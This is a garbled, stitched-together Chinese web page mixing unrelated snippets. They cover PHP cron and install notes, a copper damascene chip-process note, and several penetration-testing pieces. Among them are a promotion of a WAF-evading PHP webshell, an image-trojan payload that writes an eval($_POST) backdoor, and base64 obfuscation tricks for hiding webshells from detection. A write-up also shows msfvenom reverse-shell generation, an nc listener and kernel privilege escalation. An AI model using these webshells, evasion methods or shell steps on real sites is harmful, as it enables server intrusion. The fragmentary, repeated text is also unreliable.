分享一款博主一直在用的很不错的大马,PHP免杀过waf-幽灵ColdBlue免杀版本[官方去除后门版],此大马只为安全测试,请勿用于非法用途,如有问题,博主概不负责!
"wget php:" [[ -e php-5.6.30 ]] && mv php-5.6.30 php-5.6.30.bak-$(date +%M) tar xf php-5.6.30.tar.gz.../var/log/php-fpm cd php-5.6.30 ....$DownloadFileDir/file/php-fpm.ini php.ini \cp $DownloadFileDir/file/php-fpm.conf php-fpm.conf sed -i...php-fpm on mkdir -p $php_data_dir cat > $php_data_dir/phpinfo.php << EOF <?...php phpinfo(); EOF \cp $DownloadFileDir/file/php-fpm.tz.php $php_data_dir/tz.php chown -R $php_user
但是由于是图片木马,PHP脚本并无法被解析,菜刀连接木马失败: 既然图片木马也无法解析,那该怎么办?...首先通过上述方法制造新的图片木马,图片文件后面的PHP脚本更改为: <?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[hack]);?...以后等我渗透熟练了,会好好研究一下PHP代码的各种免杀技巧。很好玩,思路很猥琐。 小马和大马 小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。...来看看一个大马利用实例:在虚拟机中往DVWA上传PHP大马(源码附在最后): 访问木马文件123.php,提交密码123456后进入大马的功能列表,下图所示为文件管理功能: 继续访问下命令执行功能...webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。
图片 但是由于是图片木马,PHP脚本并无法被解析,菜刀连接木马失败: 既然图片木马也无法解析,那该怎么办?...首先通过上述方法制造新的图片木马,图片文件后面的PHP脚本更改为: <?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[hack]);?...以后等我渗透熟练了,会好好研究一下PHP代码的各种免杀技巧。很好玩,思路很猥琐。 小马和大马 小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。...来看看一个大马利用实例:在虚拟机中往DVWA上传PHP大马(源码附在最后): 图片 访问木马文件123.php,提交密码123456后进入大马的功能列表,下图所示为文件管理功能: 图片...webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。
使用PHP定时执行某些任务的话, 可以有以下两个方法: 1. linux下crontab, windows下计划任务 2....使用php的相关函数 set_time_limit(0); ignore_user_abort(true); //这里写一个死循环 第一个方法是最常见的, 如果php服务器上没有权限去crontab,...示例:创建index.php和test.txt,功能是往test.txt里每秒覆盖写一个数字,该数字递增。index.php代码如下: <?.../test.txt',$num); $num++; sleep(1); }while(true); 关闭浏览器后,发现依然能执行脚本,该数字依旧递增。...set_time_limit(0) 取消php文件的执行时间,如果没有这个函数的话,默认php的执行时间是30秒,也就是说30秒后,这个文件就say goodbay了。
V站笔记 这篇文章主要介绍了PHP记录搜索引擎蜘蛛访问网站足迹的方法,实例分析了针对php记录搜索引擎蜘蛛访问足迹的技巧,涉及数据库的创建及php记录各类常见搜索引擎访问的方法,需要的朋友可以参考下。...数据库版:php蜘蛛记录数据库版.zip ⒈首先导入zz.sql数据库文件; ⒉上传zz.php到网站根目录; txt记录版:php蜘蛛记录txt版.zip ⒈上传zz.php到网站根目录; ⒉上传zz.txt...到网站根目录; 本文实例讲述了PHP记录搜索引擎蜘蛛访问网站足迹的方法。
PHP的脚本执行: PHP的脚本执行还是会经过编译环节, 只不过它们一般会在运行的时候实时进行编译 1.启动PHP及Zend引擎, 加载注册的扩展模块 2.读取脚本文件,Zend引擎对脚本文件进行词法分析...3.编译成opcode执行 4.如果安装opcode缓存扩展(如APC, xcache, eAccelerator等),可能直接从缓存中读取opcode执行 脚本的编译执行: 1.读取脚本,通过lex按照词法规则切分一个一个的标记...3.Zend引擎将代码编译为opcode 4.PHP是构建在Zend虚拟机(Zend VM)之上的。PHP的opcode就是Zend虚拟机中的指令。
首先,确认 PHP 可执行文件的位置 —— 对于大多数 Linux 系统,几乎肯定是 /usr/bin/php。...如果不确定其位置,请在命令行中键入 which php 并查看响应内容。 其次,键入以下代码,确保将 /usr/bin/php 替换为 PHP 可执行文件的实际路径。 <?php #!...test.php >> /dev/null & 或者另外一种形式直接在Crontab中配置 */2 * * * * /usr/bin/php -f /var/www/html/*.php ======...OK,以下是配置步骤: 1.Linux下必须编译安装PHP解释器,在安装完成后,要将安装目录下${PHP}/bin/php 文件复制到 /usr/bin/下,并使用chmod +x ..../php 为其添加可执行权限,ok了, 然后在linux命令行下输入:php -q *.php 执行一个php程序,以验证是否解释器工作正常 2.发布php文件:将编写好的php程序发布到apache
这篇文章主要介绍了PHP记录搜索引擎蜘蛛访问网站足迹的方法,实例分析了针对php记录搜索引擎蜘蛛访问足迹的技巧,涉及数据库的创建及php记录各类常见搜索引擎访问的方法,需要的朋友可以参考下。...数据库版:php蜘蛛记录数据库版.zip ⒈首先导入zz.sql数据库文件; ⒉上传zz.php到网站根目录; txt记录版:php蜘蛛记录txt版.zip ⒈上传zz.php到网站根目录...; ⒉上传zz.txt到网站根目录; 本文实例讲述了PHP记录搜索引擎蜘蛛访问网站足迹的方法。
Paste_Image.png PHP缩写:Personal Home Page php发展历史: 95PHP/FI 、 97PHP/FI2.0 、98PHP3、 2000PHP4、2005PHP5...> php的应用领域: web服务器端脚本:主要作用: 命令行脚本 运行php文件:php.exe -f "php文件路径" 运行php代码:php.exe -r "php脚本代码" 其中有一个文件...:php.exe,可以用它来执行“php代码” ?...Paste_Image.png 1、运行php文件: 形式:php.exe -f "php文件路径" <?...Paste_Image.png 所以通过命令行并不会识别换行 2、直接运行PHP代码: 形式:php.exe -r "php脚本代码" ? Paste_Image.png
这篇笔记介绍下铜的大马士革镶嵌工艺。小豆芽之前对于金属图案的理解是先沉积一层金属,然后再通过干法刻蚀的方法形成图案。最近才发现自己的理解不够全面。...因此,人们提出了大马士革镶嵌(Damascene plating)的方法来形成铜的互联线。 大马士革镶嵌本来是指将多种金属镶嵌在一起,用于制作精美的工艺品,如下图所示。...(图片来自https://www.xuehua.us/2018/06/20/原创设计典范-大马士革镶嵌黄金戒指/) 对于铜互联线的镶嵌工艺,正是借鉴了这一思想,先是对介质进行刻蚀,形成孔洞,然后沉积金属铜...图片来自https://commons.wikimedia.org/wiki/File:Dual-Damascene-Prozess_(self_aligned;_Schautafel).svg) 以上是对大马士革镶嵌工艺的简单介绍...在半导体工艺流程中,大马士革镶嵌工艺是非常重要的一个步骤。细想起来,也就是捡软柿子捏,无法直接对Cu刻蚀,就欺负软柿子——介质层,然后让硬柿子填充到安排好的座位中。
CMS:织梦(v57 sp2) 脚本语言:php(7.3.4) 织梦默认后台地址:/dede/login.php(访问一下,没问题,后台地址未被修改) 访问后台: ?...后台帐号密码:admin admin 文件管理器存在任意文件上传 图里面的webshell.php和test.php都是我上传的大马。 为什么不是先传小马呢?...test.php有个搜索文件的功能,有利于我们找falg,但是这个大马查看文件的时候会403(所以用了webshell.php打包系统文件下载下来,进行查看),这个大马还有执行系统函数的模块,但是很明显执行不了...再来看看上传后的大马: ? test.php:搜索flag.txt,整个C盘确实就搜到这么一个flag.txt文件。...登录webshell大马:admin 打包flag.txt,base64解密一下即可。 ? 代码执行漏洞 先访问http://106.54.65.253/dede/tpl.php?
windows Robots.txt:存在 开放端口:利用fofa插件搜集一波,nmap搜集到135、139、445是filtered状态 访问disallow文件: CMS:织梦(v57 sp2) 脚本语言...:admin admin 文件管理器存在任意文件上传 图里面的webshell.php和test.php都是我上传的大马。...test.php有个搜索文件的功能,有利于我们找falg,但是这个大马查看文件的时候会403(所以用了webshell.php打包系统文件下载下来,进行查看),这个大马还有执行系统函数的模块,但是很明显执行不了...如下图: 再来看看上传后的大马: test.php:搜索flag.txt,整个C盘确实就搜到这么一个flag.txt文件。...登录webshell大马:admin 打包flag.txt,base64解密一下即可。 代码执行漏洞 先访问http://106.54.65.253/dede/tpl.php?
本文作者:s9mf 对于很多,和我一样刚刚入门,或者还在门边徘徊的小伙伴们,在渗透学习的过程中,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢...一. webshell 免杀 0x0 php 内置函数加密 小例子: 在制作免杀大马之前,我们先来看看,一个带后门的免杀 php 大马是如何制作的。 ? 在后门网站 webshell8 下载好大马。...base64_encode(gzcompress($code)) base64_encode(gzdeflate($code)); 我简单写了个脚本,大家对应修改就OK $code= file_get_contents...php$l='baSe6';$o='4_dE';$v='cO';$e='DE';$love=$l.$o.$v.$e;$a=$love('PHP大马BASE64加密内容');eval($a=$a);?...更小更方便 为了减小大马体积,我们常常使用 php 读取网络文件 curl, fsockopen ,file_get_contents 函数,这样的大马整体体积甚至只有几百字节,但是要注意,目标网站要是禁用了
在CentOS下可以通过shell脚本执行定时任务 在macos下 有类似的功能 使用crontab crontab的格式: f1 f2 f3 f4 f5 program # 分(0-59) 时(0-...crontab的基本使用: sudo -i # 进入root权限 crontab -l # 查看定时任务 crontab -e # 编辑定时任务 crontab -r # 删除定时任务 如何定时执行本地的php...项目呢 首先crontab -e打开定时任务 */10 * * * * /usr/bin/php /Library/WebServer/Documents/...test.php >>/Library/...WebServer/Documents/...test.log */10 表示 每10分钟执行一次 >> 表示 追加输出到 test.log文件 > 表示覆盖输出到test.log php目录需要使用绝对位置...除了命令行php方式运行,还可以用 wget,curl方式打开本地的php脚本 譬如: * * * * curl http://localhost/...test.php > /Desktop/test.log
: $php_bin_dir" echo "php_data_dir: $php_data_dir" if [[ $tmp = "n" ]];then read -p.../configure --with-php-config=$php_bin_dir/bin/php-config &>> $InstallLogFile || fun_failed "configure.../lib/php/extensions) ExtFile=/usr/local/php/lib/php/extensions/$tmp sed -i "s#^; extension_dir....#g" $php_bin_dir/conf/php.ini \cp $DownloadFileDir/file/php-fpm.redis.php $php_data_dir/redis.php cd...[32mredis-php installed \033[0m" echo echo "php_bin_dir: $php_bin_dir" echo "php_data_dir: $php_data_dir
上篇说到wordpress把php和apache搞崩溃的问题,我看了一下php版本5.2.17有点老,遂升级,原来装的这一套是再lnmp.org上面下的,说实话licess和lnmp对于我们这种小白级的用户带来了太多方便...这个脚本放在什么地方,写了什么东西都是问题,即便作者不乱来,假设放这个脚本的地方被攻陷了,其他黑客修改了脚本,也能给你的系统带来不可估计的风险。...当然你不信就不用就是了,我使用1.0版本的lnmpa_upgrade_php脚本时候就出现了问题,先是脚本根据输入的版本号下载php源码包,然后configure和make,其中configure的命令行是写死在脚本里面的...,实际上随着php的变化有一些参数已经不适用了,例如说enable-safe-mode。...此外脚本里面configure之后从老的apache目录下拷来了libtool覆盖了php本目录下的libtool,导致后面编译失败,这个处理也没有任何注释之类的解释是为何要这样做。
192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf 利用菜刀上传php...大马,并将生成的elf木马上传到目标机 进入大马进行反弹shell提权 kali本地监听12388端口 nc -lvvp 12388 大马进行反弹shell 反弹成功 uname...-a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本 gcc shell.c -o shell ....proxychains.conf 将设置的socks4添加进末尾 代理打开firefox 访问192.168.1.100 弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php...,PHP,php3 添加新文章上传php大马 直接拖拽成功上传后,可以查看路径,直接访问地址 由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具
(未命名安全团队取证过程截图) 收集网站IP、系统、容器脚本、旁站子域名、端口、目录等信息 ?...加个单引号报错了,有戏,而且还是前阵子爆出后门的php5.4.45的版本 ?...而且遇到一个坑卡了很久,大马进不去,密码是本地测试过是对的,无论输入多少次都是卡在这个页面,也换过其它大马测试也是这样。...后来是实在搞不明白去请教前辈,告诉我远程下载的原理是目标服务器去访问我们大马去下载,而服务器只会把访问到前端页面的代码文件下载到电脑,服务器访问就是以下图的页面,所以大马的其它代码没有被下载到,只被下载到这个前端页面...解决的办法就是把大马文件改成txt,这样服务器访问就可以把完整大马代码给下载到,只要下指定绝对路径时改成php脚本就可以正常运行大马了。
在对一个web站点进行渗透测试的渗透攻击阶段,一般会想办法突破上传限制,向目标可执行目录中写入一个带有攻击性质的脚本来协助获取更大的服务器权限。 这里我们就一起来盘点一下常用的web后门吧!...大马与小马 在几年前很流行的网站入侵打油诗中有写: 进谷歌 找注入 没注入 就旁注 没旁注 用0day 没0day 猜目录 没目录 就嗅探 爆账户 找后台 传小马 放大马 拿权限 挂页面 放暗链 清数据...清日志 留后门 其中的传小马上大马就是我们要说的小马大马了,小马的功能一般都比较单一,作用一般是向服务器中写入文件数据。...这里贴一个php小马 ? 大马一般就提供了更多的功能,例如辅助提权,执行sql语句,反弹shell等。...不过网上很多的大马都加了后门,例如图中的这款从mumaasp.com这个网站下载的一款大马会将木马的地址和密码提交到http://www.mumaasp.com/xz/sx.asp这个网址 ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
